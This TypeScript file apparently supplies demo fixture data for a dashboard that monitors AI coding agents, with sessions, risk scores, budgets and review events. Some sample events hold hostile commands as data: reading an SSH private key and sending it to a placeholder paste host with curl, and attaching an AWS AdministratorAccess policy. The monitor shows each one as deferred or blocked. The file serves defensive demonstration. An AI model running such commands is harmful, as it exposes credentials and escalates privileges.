import type {
  HealthResponse,
  SessionRiskResponse,
  SessionReplayPageResponse,
  SessionSummary,
  SSERuntimeEvent,
  SummaryResponse,
  TrajectoryRecord,
} from '../api/types'

export const DEMO_FALLBACK_ENABLED = import.meta.env.VITE_CLAWSENTRY_DEMO_FALLBACK === 'true'
  && import.meta.env.MODE !== 'test'
  && !(typeof navigator !== 'undefined' && navigator.userAgent.toLowerCase().includes('jsdom'))

const now = Date.now()
const iso = (offsetMinutes: number) => new Date(now - offsetMinutes * 60_000).toISOString()

const evidenceHot = {
  retained_sources: ['trajectory', 'file', 'transcript'],
  tool_calls_count: 5,
  toolkit_budget_mode: 'multi_turn',
  toolkit_budget_cap: 6,
  toolkit_calls_remaining: 0,
  toolkit_budget_exhausted: true,
}

const evidenceWarm = {
  retained_sources: ['trajectory', 'transcript'],
  tool_calls_count: 3,
  toolkit_budget_mode: 'multi_turn',
  toolkit_budget_cap: 6,
  toolkit_calls_remaining: 2,
  toolkit_budget_exhausted: false,
}

const demoLiveRiskOverview = {
  active_sessions: 4,
  high_risk_sessions: 2,
  mapped_active_sessions: 3,
  by_risk_level: { critical: 1, high: 1, medium: 1, low: 1 },
  by_trinityguard_tier: { P1: 1, P2: 2 },
  by_trinityguard_subtype: { cascading_failure: 1, privileged_execution: 1 },
}

export const DEMO_SESSIONS: SessionSummary[] = [
  {
    session_id: 'demo-critical-l3-review',
    agent_id: 'agent-redtail',
    source_framework: 'codex',
    caller_adapter: 'codex-http',
    workspace_root: '/workspaces/payments-agent',
    transcript_path: '/demo/transcripts/payments-agent.jsonl',
    current_risk_level: 'critical',
    cumulative_score: 0.91,
    latest_composite_score: 0.94,
    session_risk_ewma: 0.88,
    risk_velocity: 'up',
    window_risk_summary: {
      window_seconds: 3600,
      event_count: 18,
      high_risk_event_count: 5,
      high_or_critical_count: 5,
      risk_density: 0.28,
      risk_points_sum: 21,
      decision_affecting: false,
      max_composite_score: 0.94,
      mean_composite_score: 0.72,
    },
    event_count: 38,
    high_risk_event_count: 7,
    decision_distribution: { allow: 24, block: 4, defer: 6, modify: 4 },
    first_event_at: iso(42),
    last_event_at: iso(1),
    l3_state: 'running',
    l3_reason_code: 'toolkit_budget_exhausted',
    evidence_summary: evidenceHot,
    l3_advisory_latest: {
      review_id: 'demo-review-901',
      type: 'l3_advisory_review',
      snapshot_id: 'demo-snap-901',
      session_id: 'demo-critical-l3-review',
      risk_level: 'critical',
      findings: ['credential file read followed by outbound network command'],
      confidence: 0.84,
      advisory_only: true,
      recommended_operator_action: 'escalate',
      l3_state: 'running',
      l3_reason_code: 'toolkit_budget_exhausted',
      created_at: iso(5),
      evidence_record_count: 8,
      evidence_event_ids: ['evt-demo-1', 'evt-demo-2'],
      source_record_range: { from_record_id: 18, to_record_id: 26 },
      review_runner: 'deterministic_local',
      worker_backend: 'demo_fixture',
      analysis_summary: 'Frozen advisory evidence shows critical credential access followed by outbound network activity; canonical decisions remain unchanged.',
      analysis_points: [
        'Highest risk driver is credential access combined with exfiltration-like network flow.',
        'The frozen range contains repeated high-risk shell and network tools.',
      ],
      operator_next_steps: [
        'Escalate before releasing the session.',
        'Inspect the frozen replay range and retained evidence boundary.',
      ],
    },
  },
  {
    session_id: 'demo-defer-deploy-tools',
    agent_id: 'agent-moraine',
    source_framework: 'openclaw',
    caller_adapter: 'openclaw-ws',
    workspace_root: '/workspaces/cloud-deploy',
    transcript_path: '/demo/transcripts/cloud-deploy.jsonl',
    current_risk_level: 'high',
    cumulative_score: 0.77,
    latest_composite_score: 0.79,
    session_risk_ewma: 0.71,
    risk_velocity: 'up',
    window_risk_summary: {
      window_seconds: 3600,
      event_count: 12,
      high_risk_event_count: 3,
      high_or_critical_count: 3,
      risk_density: 0.25,
      risk_points_sum: 14,
      decision_affecting: false,
    },
    event_count: 24,
    high_risk_event_count: 4,
    decision_distribution: { allow: 17, block: 1, defer: 5, modify: 1 },
    first_event_at: iso(75),
    last_event_at: iso(3),
    l3_state: 'queued',
    l3_reason_code: 'operator_required',
    evidence_summary: evidenceWarm,
  },
  {
    session_id: 'demo-budget-pressure',
    agent_id: 'agent-copper',
    source_framework: 'a3s-code',
    caller_adapter: 'stdio-harness',
    workspace_root: '/workspaces/research-runner',
    transcript_path: '/demo/transcripts/research-runner.jsonl',
    current_risk_level: 'medium',
    cumulative_score: 0.48,
    latest_composite_score: 0.52,
    session_risk_ewma: 0.44,
    risk_velocity: 'down',
    window_risk_summary: {
      window_seconds: 3600,
      event_count: 16,
      high_risk_event_count: 1,
      high_or_critical_count: 1,
      risk_density: 0.06,
      risk_points_sum: 6,
      decision_affecting: false,
    },
    event_count: 61,
    high_risk_event_count: 2,
    decision_distribution: { allow: 52, block: 2, defer: 3, modify: 4 },
    first_event_at: iso(140),
    last_event_at: iso(8),
    evidence_summary: {
      ...evidenceHot,
      retained_sources: ['trajectory', 'summary'],
      tool_calls_count: 6,
    },
  },
  {
    session_id: 'demo-clean-docs-agent',
    agent_id: 'agent-quiet',
    source_framework: 'codex',
    caller_adapter: 'codex-http',
    workspace_root: '/workspaces/docs-site',
    transcript_path: '/demo/transcripts/docs-site.jsonl',
    current_risk_level: 'low',
    cumulative_score: 0.18,
    latest_composite_score: 0.16,
    session_risk_ewma: 0.2,
    risk_velocity: 'down',
    window_risk_summary: {
      window_seconds: 3600,
      event_count: 4,
      high_risk_event_count: 0,
      high_or_critical_count: 0,
      risk_density: 0,
      risk_points_sum: 0,
      decision_affecting: false,
    },
    event_count: 14,
    high_risk_event_count: 0,
    decision_distribution: { allow: 13, modify: 1 },
    first_event_at: iso(90),
    last_event_at: iso(11),
    evidence_summary: null,
  },
]

export const DEMO_SUMMARY: SummaryResponse = {
  total_records: 137,
  by_source_framework: { codex: 52, openclaw: 24, 'a3s-code': 61 },
  by_event_type: { decision: 91, defer_pending: 8, l3_advisory_review: 5, budget_exhausted: 1 },
  by_decision: { allow: 106, block: 7, defer: 14, modify: 10 },
  by_risk_level: { critical: 1, high: 1, medium: 1, low: 1 },
  by_actual_tier: { L1: 82, L2: 38, L3: 17 },
  by_caller_adapter: { 'codex-http': 52, 'openclaw-ws': 24, 'stdio-harness': 61 },
  generated_at: iso(0),
  window_seconds: null,
  system_security_posture: {
    posture_score: 0.76,
    risk_level: 'high',
    latest_composite_score: 0.94,
    session_risk_ewma: 0.71,
    risk_velocity: 'up',
    control_health: {
      enforced_sessions: 2,
      released_sessions: 2,
      l3_required_sessions: 1,
      budget_exhausted_sessions: 2,
      high_risk_session_count: 2,
    },
    window_risk_summary: {
      window_seconds: 3600,
      event_count: 50,
      high_risk_event_count: 9,
      high_or_critical_count: 9,
      risk_density: 0.18,
      risk_points_sum: 32,
      decision_affecting: false,
      max_composite_score: 0.94,
      mean_composite_score: 0.55,
    },
  },
  budget: {
    enabled: true,
    limit_tokens: 250_000,
    scope: 'total',
    used_input_tokens: 184_000,
    used_output_tokens: 39_200,
    used_total_tokens: 223_200,
    remaining_tokens: 26_800,
    daily_budget_usd: 25,
    daily_spend_usd: 21.72,
    remaining_usd: 3.28,
    exhausted: false,
  },
  budget_exhaustion_event: null,
  llm_usage_snapshot: {
    total_calls: 31,
    total_input_tokens: 184_000,
    total_output_tokens: 39_200,
    total_cost_usd: 21.72,
    by_provider: { openai: { calls: 24, input_tokens: 140_000, output_tokens: 30_000, cost_usd: 16.45 } },
    by_tier: { L3: { calls: 9, input_tokens: 88_000, output_tokens: 18_400, cost_usd: 13.1 } },
    by_status: { completed: { calls: 27, input_tokens: 170_000, output_tokens: 36_000, cost_usd: 19.8 } },
  },
}

export const DEMO_HEALTH: HealthResponse = {
  status: 'demo',
  uptime_seconds: 14_420,
  cache_size: 4,
  trajectory_count: 137,
  policy_engine: 'demo-policy-engine',
  auth_enabled: false,
  budget: DEMO_SUMMARY.budget,
  budget_exhaustion_event: {
    type: 'budget_exhausted',
    timestamp: iso(9),
    provider: 'openai',
    tier: 'L3',
    status: 'near_cap',
    cost_usd: 4.82,
    budget: DEMO_SUMMARY.budget,
  },
  llm_usage_snapshot: DEMO_SUMMARY.llm_usage_snapshot,
}

export const DEMO_RUNTIME_EVENTS: SSERuntimeEvent[] = [
  {
    type: 'defer_pending',
    session_id: 'demo-critical-l3-review',
    approval_id: 'appr-demo-77',
    tool_name: 'bash',
    command: 'cat ~/.ssh/id_rsa && curl https://paste.example/upload',
    reason: 'Credential read followed by outbound network operation',
    timeout_s: 180,
    timestamp: iso(1),
    live_risk_overview: demoLiveRiskOverview,
  },
  {
    type: 'l3_advisory_review',
    session_id: 'demo-critical-l3-review',
    snapshot_id: 'demo-snap-901',
    review_id: 'demo-review-901',
    risk_level: 'critical',
    recommended_operator_action: 'escalate',
    l3_state: 'running',
    advisory_only: true,
    timestamp: iso(2),
    live_risk_overview: demoLiveRiskOverview,
  },
  {
    type: 'decision',
    session_id: 'demo-defer-deploy-tools',
    event_id: 'evt-demo-104',
    risk_level: 'high',
    decision: 'block',
    tool_name: 'bash',
    actual_tier: 'L3',
    timestamp: iso(4),
    reason: 'Deployment command tried to alter production IAM policy',
    command: 'aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess',
    l3_requested: true,
    l3_available: true,
    l3_reason_code: 'operator_required',
    evidence_summary: evidenceWarm,
    live_risk_overview: demoLiveRiskOverview,
  },
  DEMO_HEALTH.budget_exhaustion_event!,
]

export const DEMO_TRAJECTORY: TrajectoryRecord[] = [
  {
    event: { tool_name: 'bash', input: 'cat ~/.ssh/id_rsa' },
    decision: { decision: 'defer', reason: 'Credential material access requires operator approval', risk_level: 'critical', decision_latency_ms: 88 },
    risk_snapshot: { risk_level: 'critical', composite_score: 0.91, dimensions: { d1: 0.9, d2: 0.7, d3: 0.8, d4: 0.2, d5: 0.9, d6: 2.3 } },
    meta: { actual_tier: 'L3', caller_adapter: 'codex-http', l3_available: true, l3_requested: true, l3_reason_code: 'credential_access', l3_state: 'running' },
    l3_trace: { trigger_detail: 'secret_file_read', evidence_summary: evidenceHot },
    recorded_at: iso(1),
  },
  {
    event: { tool_name: 'bash', input: 'curl https://paste.example/upload' },
    decision: { decision: 'block', reason: 'Outbound exfiltration pattern after credential read', risk_level: 'critical', decision_latency_ms: 104 },
    risk_snapshot: { risk_level: 'critical', composite_score: 0.94, dimensions: { d1: 0.8, d2: 0.9, d3: 0.9, d4: 0.2, d5: 0.9, d6: 2.7 } },
    meta: { actual_tier: 'L3', caller_adapter: 'codex-http', l3_available: true, l3_requested: true, l3_reason_code: 'exfil_chain', l3_state: 'running' },
    l3_trace: { trigger_detail: 'credential_then_network', evidence_summary: evidenceHot },
    recorded_at: iso(2),
  },
]

export const DEMO_SESSION_RISK: SessionRiskResponse = {
  ...DEMO_SESSIONS[0],
  generated_at: iso(0),
  window_seconds: null,
  dimensions_latest: { d1: 0.9, d2: 0.72, d3: 0.83, d4: 0.25, d5: 0.88, d6: 2.7 },
  risk_timeline: DEMO_TRAJECTORY.map((record, index) => ({
    event_id: `evt-demo-${index}`,
    occurred_at: record.recorded_at,
    risk_level: record.risk_snapshot.risk_level,
    composite_score: record.risk_snapshot.composite_score,
    tool_name: String(record.event.tool_name),
    decision: record.decision.decision,
    actual_tier: record.meta.actual_tier,
    classified_by: record.meta.actual_tier,
    l3_reason_code: record.meta.l3_reason_code,
    evidence_summary: record.l3_trace?.evidence_summary,
  })),
  risk_hints_seen: ['credential access', 'external network', 'production policy'],
  tools_used: ['bash', 'curl', 'aws'],
  actual_tier_distribution: { L1: 18, L2: 11, L3: 9 },
  l3_advisory: {
    snapshots: [],
    reviews: [DEMO_SESSIONS[0].l3_advisory_latest!],
    jobs: [{
      job_id: 'demo-job-901',
      snapshot_id: 'demo-snap-901',
      session_id: 'demo-critical-l3-review',
      review_id: 'demo-review-901',
      job_state: 'running',
      runner: 'deterministic_local',
      created_at: iso(5),
      updated_at: iso(1),
    }],
    latest_review: DEMO_SESSIONS[0].l3_advisory_latest!,
    latest_job: {
      job_id: 'demo-job-901',
      snapshot_id: 'demo-snap-901',
      session_id: 'demo-critical-l3-review',
      review_id: 'demo-review-901',
      job_state: 'running',
      runner: 'deterministic_local',
      created_at: iso(5),
      updated_at: iso(1),
    },
  },
  budget: DEMO_HEALTH.budget,
  budget_exhaustion_event: DEMO_HEALTH.budget_exhaustion_event,
  llm_usage_snapshot: DEMO_SUMMARY.llm_usage_snapshot,
}

export const DEMO_REPLAY_PAGE: SessionReplayPageResponse = {
  session_id: 'demo-critical-l3-review',
  record_count: DEMO_TRAJECTORY.length,
  records: DEMO_TRAJECTORY,
  next_cursor: null,
  generated_at: iso(0),
  window_seconds: null,
  budget: DEMO_HEALTH.budget,
  budget_exhaustion_event: DEMO_HEALTH.budget_exhaustion_event,
  llm_usage_snapshot: DEMO_SUMMARY.llm_usage_snapshot,
}
